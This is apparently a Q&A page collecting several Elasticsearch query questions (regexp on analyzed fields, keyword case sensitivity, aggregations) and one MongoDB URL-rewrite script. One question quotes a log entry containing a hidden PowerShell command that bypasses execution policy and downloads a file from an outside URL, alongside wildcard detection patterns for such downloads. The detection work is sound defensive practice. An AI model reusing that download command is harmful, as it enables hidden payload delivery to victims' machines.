How to search for "\....\" using regexp in Elasticsearch

My indexed data contains documents with values like this:
"exclude y:\dkj....\sdfisd\sdfsdf\asdfai"
I need to find all documents that contain such entries, matching on "\....\", so I am using a "regexp" query.
I have tried the regular expressions below, but none of them worked:
".*\\(\.\.\.\.)\\.*"
".*?[\.]{4}.*"
".*\\[\.]{4}\\.*"
Below is the part of the query that I am sending to Elasticsearch:
"bool" : {
  "must" : [ {
    "query_string" : {
      "query" : "\"DC2\"",
      "default_field" : "COLLECTOR_NAME"
    }
  }, {
    "regexp" : {
      "RAW_EVENT_DATA" : {
        "value" : ".*?[\\.]{4}.*",
        "flags_value" : 0
      }
    }
  } ]
}
Please provide some suggestions.

This is usually related to the analyzer.
Let's create a type with the following mapping:
{
  "my_index": {
    "mappings": {
      "test": {
        "properties": {
          "title": {
            "type": "string"
          },
          "title_raw": {
            "type": "string",
            "index": "not_analyzed"
          }
        }
      }
    }
  }
}
Add a new document:
POST my_index/test/1
{
  "title": "exclude y:\\dkj....\\sdfisd\\sdfsdf\\asdfai",
  "title_raw": "exclude y:\\dkj....\\sdfisd\\sdfsdf\\asdfai"
}
Now search for it:
POST my_index/test/_search
{
  "query": {
    "regexp" : {
      "title" : {
        "value" : ".*?[\\.]{4}.*",
        "flags_value" : 0
      }
    }
  }
}
This returns an empty result.
But the not_analyzed field works perfectly with regexp:
POST my_index/test/_search
{
  "query": {
    "regexp" : {
      "title_raw" : {
        "value" : ".*?[\\.]{4}.*",
        "flags_value" : 0
      }
    }
  }
}
The documentation explains why this happens: because the title field uses the standard analyzer, part of the information (punctuation such as the dots and backslashes) is lost at indexing time and is not available at search time.
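To make the difference between the two fields concrete, here is a small JavaScript sketch. It is not Elasticsearch code: roughTokens is a hypothetical helper that only approximates the standard analyzer (lowercase, split on anything that is not a letter or digit), and the pattern is anchored by hand because a regexp query has to match a whole indexed term.

```javascript
// Rough stand-in for the standard analyzer (assumption: the real analyzer
// follows Unicode text segmentation rules, this is only an approximation).
function roughTokens(text) {
  return text.toLowerCase().split(/[^a-z0-9]+/).filter(Boolean);
}

// A regexp query is matched against whole terms, so anchor the pattern.
const fourDots = /^.*\.{4}.*$/;

const value = "exclude y:\\dkj....\\sdfisd\\sdfsdf\\asdfai";

// Analyzed field: one term per token, and no token keeps the dots.
const analyzedTerms = roughTokens(value);
// not_analyzed field: the whole value is stored as a single term.
const rawTerms = [value];

const analyzedHit = analyzedTerms.some((term) => fourDots.test(term));
const rawHit = rawTerms.some((term) => fourDots.test(term));

console.log(analyzedTerms);
console.log("analyzed field matches:", analyzedHit);
console.log("not_analyzed field matches:", rawHit);
```

To see the terms Elasticsearch really produces for your field, run the value through the _analyze API rather than relying on this approximation.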

Related

AWS ElasticSearch Query for Keyword not getting results I expect

I have an ElasticSearch query that looks like:
{
  "query": {
    "constant_score": {
      "filter": {
        "bool": {
          "should": [
            {
              "wildcard": {
                "Message.keyword": "*System.Net.WebClient).DownloadString(*"
              }
            },
            {
              "wildcard": {
                "Message.keyword": "*system.net.webclient).downloadfile(*"
              }
            }
          ]
        }
      }
    }
  }
}
And a Doc in my Index that includes:
message:Engine state is changed from None to Available. Details: NewEngineState=Available PreviousEngineState=None SequenceNumber=13 HostName=ConsoleHost HostVersion=5.1.18362.628 HostId=3dd1a50a-cc15-45e0-bf63-4456d556fb67 HostApplication=powershell.exe -command PowerShell -ExecutionPolicy bypass -noprofile -windowstyle hidden -command (New-Object System.Net.WebClient).DownloadFile('https://drive.google.com/uc?export=download EngineVersion=5.1.18362.628 RunspaceId=de762b62-056c-4be1-90bf-a12cfe6fbc72
As you can see above it includes:
(New-Object System.Net.WebClient).DownloadFile('https:....
It seems like the filter here should be matching the message, but when I execute the Query through Kibana, nothing matches even though I can see the doc above inside my index through Kibana UI if I just query for *.
I think maybe this is because the query above is querying for Message.keyword? How do I get it to successfully hit the document above?
Edit:
mapping: https://pastebin.com/cWN4jF3d
Sample data: https://pastebin.com/SyErqaG8
There are two reasons why the query does not return the document:
1. The field name in the mapping is message, whereas the query uses Message.
2. A field with the keyword datatype indexes the data as is, so matching is case sensitive. The document you shared contains System.Net.WebClient).DownloadFile( with upper-case characters, whereas the pattern you expect to match, "*system.net.webclient).downloadfile(*", is all lower case.
Therefore the query should be:
{
  "query": {
    "constant_score": {
      "filter": {
        "bool": {
          "should": [
            {
              "wildcard": {
                "message.keyword": "*System.Net.WebClient).DownloadString(*"
              }
            },
            {
              "wildcard": {
                "message.keyword": "*System.Net.WebClient).DownloadFile(*"
              }
            }
          ]
        }
      }
    }
  }
}
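The case-sensitivity point can be checked outside Elasticsearch with a short JavaScript sketch. wildcardToRegExp is a hypothetical helper written for this illustration (it is not an Elasticsearch API), and the message is a shortened excerpt of the document from the question.

```javascript
// Turn a wildcard pattern (* = any run of characters, ? = one character)
// into an anchored, case-sensitive RegExp. Hypothetical helper.
function wildcardToRegExp(pattern) {
  // Escape regex metacharacters, but leave * and ? for the next step.
  const escaped = pattern.replace(/[.+^${}()|[\]\\]/g, "\\$&");
  const body = escaped.replace(/\*/g, ".*").replace(/\?/g, ".");
  return new RegExp("^" + body + "$", "s");
}

// Shortened excerpt of the indexed message (a keyword field keeps it as is).
const message =
  "HostApplication=powershell.exe -command (New-Object System.Net.WebClient).DownloadFile('https://drive.google.com/uc?export=download";

const lowerCaseHit = wildcardToRegExp("*system.net.webclient).downloadfile(*").test(message);
const exactCaseHit = wildcardToRegExp("*System.Net.WebClient).DownloadFile(*").test(message);

console.log("lower-case pattern matches:", lowerCaseHit);
console.log("exact-case pattern matches:", exactCaseHit);
```

Only the pattern that reproduces the original casing matches the stored value, which is why the second wildcard in the corrected query uses System.Net.WebClient).DownloadFile(.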
The keyword fields are used only for exact match. You will need to match the regular fields if you only want to match a substring / subset of the string, by querying on Message instead of Message.keyword:
{
  "query": {
    "constant_score": {
      "filter": {
        "bool": {
          "should": [
            {
              "wildcard": {
                "Message": "*System.Net.WebClient).DownloadString(*"
              }
            },
            {
              "wildcard": {
                "Message": "*system.net.webclient).downloadfile(*"
              }
            }
          ]
        }
      }
    }
  }
}

How can I replace a small part of the ProfilePictureUrl path in all documents with a single query in MongoDB

{
  "_id" : ObjectId("5bd6ed6a49ba281f5c54f185"),
  "AvatarSet" : {
    "Avatar" : [
      {
        "IsPrimaryAvatar" : true,
        "ProfilePictureUrl" : "https://blob.blob.core.windows.net/avatarcontainer/avatardba36759-3e8e-4666-bc2b-e53ffb527716.jpeg?version=8b1b58b3-94f8-4608-b4db-05746eea8bfe"
      }
    ]
  }
}
I need to replace only https://blob.blob.core.windows.net in ProfilePictureUrl, for every candidate in the database. How do I write a MongoDB query for this?
I'm using this query, but it's not working:
db.getCollection("candidate-staging")
.find({},{"AvatarSet":[0]})..forEach(function(e) {
e.ProfilePictureUrl= e.ProfilePictureUrl.replace("https://blob.blob.core.windows.net", "https://blob123.blob.core.windows.net");
db.candidate-staging.save(e);
});
The problem in your script is that ProfilePictureUrl is not referenced correctly; using dot notation as in the example below should solve it.
In your code, e.ProfilePictureUrl points to a missing field in the top-level document, while doc.AvatarSet.Avatar[0].ProfilePictureUrl in the following example points to the ProfilePictureUrl field of the first element of the Avatar array under the AvatarSet field.
db.test.find({}).forEach(function(doc) {
  // Rewrite the host of the first avatar's URL, then write the document back.
  doc.AvatarSet.Avatar[0].ProfilePictureUrl = doc.AvatarSet.Avatar[0].ProfilePictureUrl.replace("https://blob.blob.core.windows.net", "https://blob123.blob.core.windows.net");
  db.test.save(doc);
});
Local test:
mongos> db.test.find()
{ "_id" : ObjectId("5bdb5e3c553c271478a9a006"), "AvatarSet" : { "Avatar" : [ { "IsPrimaryAvatar" : true, "ProfilePictureUrl" : "https://blob.blob.core.windows.net/avatarcontainer/avatardba36759-3e8e-4666-bc2b-e53ffb527716.jpeg?version=8b1b58b3-94f8-4608-b4db-05746eea8bfe" } ] } }
{ "_id" : ObjectId("5bdb5e3e553c271478a9a007"), "AvatarSet" : { "Avatar" : [ { "IsPrimaryAvatar" : true, "ProfilePictureUrl" : "https://blob.blob.core.windows.net/avatarcontainer/avatardba36759-3e8e-4666-bc2b-e53ffb527716.jpeg?version=8b1b58b3-94f8-4608-b4db-05746eea8bfe" } ] } }
mongos> db.test.find({}).forEach(function(doc) {
doc.AvatarSet.Avatar[0].ProfilePictureUrl= doc.AvatarSet.Avatar[0].ProfilePictureUrl.replace("https://blob.blob.core.windows.net", "https://blob123.blob.core.windows.net");
db.test.save(doc); });
mongos> db.test.find()
{ "_id" : ObjectId("5bdb5e3c553c271478a9a006"), "AvatarSet" : { "Avatar" : [ { "IsPrimaryAvatar" : true, "ProfilePictureUrl" : "https://blob123.blob.core.windows.net/avatarcontainer/avatardba36759-3e8e-4666-bc2b-e53ffb527716.jpeg?version=8b1b58b3-94f8-4608-b4db-05746eea8bfe" } ] } }
{ "_id" : ObjectId("5bdb5e3e553c271478a9a007"), "AvatarSet" : { "Avatar" : [ { "IsPrimaryAvatar" : true, "ProfilePictureUrl" : "https://blob123.blob.core.windows.net/avatarcontainer/avatardba36759-3e8e-4666-bc2b-e53ffb527716.jpeg?version=8b1b58b3-94f8-4608-b4db-05746eea8bfe" } ] } }
The document contains an array of objects, so e.ProfilePictureUrl points to a missing field in the top-level document. To reach the objects inside the Avatar array, we need a second loop over that array, e.AvatarSet.Avatar.forEach. This worked for me:
db.getCollection("test").find({}).forEach(function(e, i) {
  // Update every entry of the Avatar array, not only the first one.
  e.AvatarSet.Avatar.forEach(function(url, j) {
    url.ProfilePictureUrl = url.ProfilePictureUrl.replace("https://blob.blob.core.windows.net", "https://blob123.blob.core.windows.net");
    e.AvatarSet.Avatar[j] = url;
  });
  db.getCollection("test").save(e);
  printjson(e);
})
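The per-document part of these loops can also be written as a plain function and tried without a database. The sketch below is only an illustration: replaceAvatarHost is a hypothetical helper, and the second Avatar entry in the sample (one without a ProfilePictureUrl) is made up to show the guard.

```javascript
// Replace the host prefix in every Avatar entry of one document.
// Mutates the document in place and returns how many URLs were changed.
function replaceAvatarHost(doc, oldHost, newHost) {
  const avatars = (doc.AvatarSet && doc.AvatarSet.Avatar) || [];
  let changed = 0;
  for (const avatar of avatars) {
    const url = avatar.ProfilePictureUrl;
    // Skip entries without a URL and URLs that start with another host.
    if (typeof url === "string" && url.startsWith(oldHost)) {
      avatar.ProfilePictureUrl = newHost + url.slice(oldHost.length);
      changed += 1;
    }
  }
  return changed;
}

const sample = {
  AvatarSet: {
    Avatar: [
      {
        IsPrimaryAvatar: true,
        ProfilePictureUrl:
          "https://blob.blob.core.windows.net/avatarcontainer/avatardba36759-3e8e-4666-bc2b-e53ffb527716.jpeg?version=8b1b58b3-94f8-4608-b4db-05746eea8bfe",
      },
      { IsPrimaryAvatar: false }, // hypothetical entry with no URL
    ],
  },
};

const changedCount = replaceAvatarHost(
  sample,
  "https://blob.blob.core.windows.net",
  "https://blob123.blob.core.windows.net"
);

console.log(changedCount, sample.AvatarSet.Avatar[0].ProfilePictureUrl);
```

Unlike String.replace, which rewrites the first occurrence anywhere in the string, this version only touches URLs that begin with the old host. Inside a forEach over the collection you could call it on each document and save only when the returned count is greater than zero.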
thanks!! manfonton and stackoverflow

Elasticsearch regexp query finds no results

I have a problem building the correct query. I have an index with a field "ids" that has the following mapping:
"ids" : {
  "type" : "text",
  "fields" : {
    "keyword" : {
      "type" : "keyword",
      "ignore_above" : 256
    }
  }
}
A sample content could look like this:
10,20,30
It's a list of ids. Now I want to make a query with multiple possible ids and I want to make a disjunction (OR) so I decided to use a regexp:
{
  "query" : {
    "bool" : {
      "must" : [
        {
          "query_string" : {
            "query" : "Test"
          }
        },
        {
          "regexp" : {
            "ids" : {
              "value" : "10031|20|10038",
              "boost" : 1
            }
          }
        }
      ]
    }
  },
  "size" : 10,
  "from" : 0
}
The query is executed successfully but with no results. I expected to find 3 results.
If you want to match 10031 or 20 or 10038, you need to add parentheses.
Change "10031|20|10038" => "(10031|20|10038)"
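One more thing worth checking with a pattern like this: a regexp query has to match a whole indexed term, not a substring of it. The JavaScript sketch below imitates that by anchoring the pattern. Whether "10,20,30" is indexed as a single term or as separate terms depends on the analyzer, so both cases are shown as assumptions, and matchesWholeTerm is a hypothetical helper.

```javascript
// Anchored match, imitating how a regexp query is applied to each term.
function matchesWholeTerm(pattern, term) {
  return new RegExp("^(?:" + pattern + ")$").test(term);
}

const pattern = "(10031|20|10038)";

// Assumption A: the whole list was indexed as one term.
const asOneTerm = ["10,20,30"];
// Assumption B: each id was indexed as its own term.
const asSeparateTerms = ["10", "20", "30"];

const hitOneTerm = asOneTerm.some((t) => matchesWholeTerm(pattern, t));
const hitSeparateTerms = asSeparateTerms.some((t) => matchesWholeTerm(pattern, t));

// If the list is one term, the pattern must also cover the surrounding ids.
const widened = "(.*,)?(10031|20|10038)(,.*)?";
const hitWidened = asOneTerm.some((t) => matchesWholeTerm(widened, t));

console.log("one term:", hitOneTerm);
console.log("separate terms:", hitSeparateTerms);
console.log("one term, widened pattern:", hitWidened);
```

If the query still returns nothing after adding the parentheses, running the sample value through the _analyze API shows which of the two assumptions applies to your index.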

Elasticsearch escape "¬" character in regex

I am stuck on the symbol "¬" when running an Elasticsearch regex query
that should return records of the form "prefix-content¬value".
Example (not limited to the website pattern; it can be any value): "website-website descriptions that not required¬www.google.com".
{
  "query": {
    "filtered": {
      "query": {
        "match_all": {}
      },
      "filter": {
        "regexp": {
          "information": "(website?)(.*¬)(www.google.com?)"
        }
      }
    }
  }
}
Has anyone encountered this problem before and managed to handle it? Thanks.

Elasticsearch aggregations over regex matching in a list

My documents in elasticsearch are of the form
{
...
dimensions : list[string]
...
}
I'd like to find all dimensions over all the documents that match a regex. I feel like an aggregation would probably do the trick, but I'm having trouble formulating it.
For example, suppose I have three documents as below:
{
  ...
  dimensions : ["alternative", "alto", "hello"]
  ...
}
{
  ...
  dimensions : ["hello", "altar"]
  ...
}
{
  ...
  dimensions : ["nore", "sore"]
  ...
}
I'd like to get the result ["alternative", "alto", "altar"] when I'm querying for the regex "alt.*"
You can achieve that with a simple terms aggregation parametrized with an include property which you can use to specify either a regexp (e.g. alt.* in your case) or an array of values to be included in the buckets. Note that there is also the exclude counterpart, if needed:
{
  "size": 0,
  "aggs": {
    "dims": {
      "terms": {
        "field": "dimensions",
        "include": "alt.*"
      }
    }
  }
}
Results:
{
  ...
  "aggregations" : {
    "dims" : {
      "doc_count_error_upper_bound" : 0,
      "sum_other_doc_count" : 0,
      "buckets" : [ {
        "key" : "altar",
        "doc_count" : 1
      }, {
        "key" : "alternative",
        "doc_count" : 1
      }, {
        "key" : "alto",
        "doc_count" : 1
      } ]
    }
  }
}
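To show what the include filter does to the buckets, here is a small in-memory imitation in JavaScript. It is a sketch, not the aggregation itself: termsWithInclude is a hypothetical helper, it assumes the include pattern must match the whole value, and it orders buckets by doc_count (descending) and then by key.

```javascript
// In-memory imitation of a terms aggregation with an "include" regexp.
function termsWithInclude(docs, field, include) {
  const anchored = new RegExp("^(?:" + include + ")$");
  const counts = new Map();
  for (const doc of docs) {
    // Count each distinct value once per document, as doc_count does.
    for (const value of new Set(doc[field] || [])) {
      if (anchored.test(value)) {
        counts.set(value, (counts.get(value) || 0) + 1);
      }
    }
  }
  return [...counts.entries()]
    .map(([key, doc_count]) => ({ key, doc_count }))
    .sort(
      (a, b) =>
        b.doc_count - a.doc_count ||
        (a.key < b.key ? -1 : a.key > b.key ? 1 : 0)
    );
}

const docs = [
  { dimensions: ["alternative", "alto", "hello"] },
  { dimensions: ["hello", "altar"] },
  { dimensions: ["nore", "sore"] },
];

const buckets = termsWithInclude(docs, "dimensions", "alt.*");
console.log(buckets);
```

With the three sample documents from the question, every matching value appears in exactly one document, so the buckets differ only by key.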